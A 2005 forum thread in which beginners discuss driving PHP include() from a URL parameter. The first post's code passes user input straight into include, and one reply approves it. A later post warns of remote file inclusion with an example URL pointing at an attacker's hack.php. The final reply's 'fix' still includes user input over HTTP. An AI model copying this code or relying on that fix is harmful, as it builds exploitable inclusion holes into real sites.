Results 1 to 4 of 4

Thread: Some Newbie PHP Questions

  1. 02-13-2005, 05:04 PM #1
    gson.bizhat.net
    gson.bizhat.net is offline Junior Member BizHat Newbie
    Join Date
    Jan 2005
    Posts
    12

    Default Some Newbie PHP Questions

    1. Right now I'm taking advantage of the include function of PHP so I can increase the robustness of my site navigation (I tend to have a brainstorm half way through every now and then) and I really don't like the usage of Frames.

    I noticed it was getting really tedious making a Switch/Case for every page I had (E.g index.php?action=contacts needed to have a
    Code:
    case 'contacts': include ('contacts.php')...
    statement) Since I'm naming the file to be included the same as the action (contacts in my previous example), could I declare a single variable to accomplish the same thing?

    Code:
    <? if (isset($_GET['action'])) $PAGE = $_GET['action']; 
include ($page+'.php');
?>
    Because right now I have a ridiculous amount of statements (150 or so) for every page of my site, and I figured there were some tricks I was missing.

    2. Also, does the page I'm including have to have a .php extention? Or could it be HTML or even TXT?

    3. Is it usually better to name the action variable to be more descriptive or more simple? (E.g. index.php?action=affiliates vs. index.php?action=affs)

    4. Can the action variable be renamed to anything I want? I notice some sites using just act.

    Thanks for your time.
    Reply With Quote Reply With Quote
  2. 02-13-2005, 11:37 PM #2
    triax
    triax is offline Junior Member BizHat Newbie
    Join Date
    Jan 2005
    Posts
    16

    Default

    1. yes you can do that, the parameter for include can be a string, btw, $PAGE is not equal to $page
    2. nope, can be any extension, usually people use inc
    3. its totally up to u, ppl use full name as its easier to debug, ppl use abbreviation because they dont wan the end user to know what is passed in the url
    4. yes, its can be anything, just make sure you $_GET['act'] the correct variable
    Reply With Quote Reply With Quote
  3. 02-17-2005, 10:59 AM #3
    classicgas
    classicgas is offline Junior Member BizHat Newbie
    Join Date
    Feb 2005
    Posts
    8

    Default

    PLEASE READ THIS CAREFULLY!!!!!!
    What you are doing using the include function may seem like a good idea but is a huge secuirity risk!! php doesnt care if the value you give it is local or remote. so someone could missues that to import a page that could reveal details such as you passwords.

    If you did it throught the header someone could do something like this

    http://www.yoursite.bithat.com/index...r.com/hack.php

    and php would still include it. You need to add some script in that will say strip the "http://" sdubstring in $page or someone could hack you easly!
    Reply With Quote Reply With Quote
  4. 02-19-2005, 07:43 PM #4
    thedenizens
    thedenizens is offline Junior Member BizHat Newbie
    Join Date
    Feb 2005
    Posts
    12

    Default

    lol i have a solution to that :) Try:

    Code:
    if(isset($HTTP_GET_VARS['page'])) {
$file_load = $HTTP_GET_VARS['page'];
$base_url = "[put your host here, eg: http://www.yourhost.com/]";
include($base_url . $file_load . ".php");
}
    That way to be able to do the hack thing you were talking about, classicgas, they would have to have access to your server anyway, to be able to put anything in past the $base_url, you see?

    lol I kno thats not hard, i just wanted to make sure :)

    hixy
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules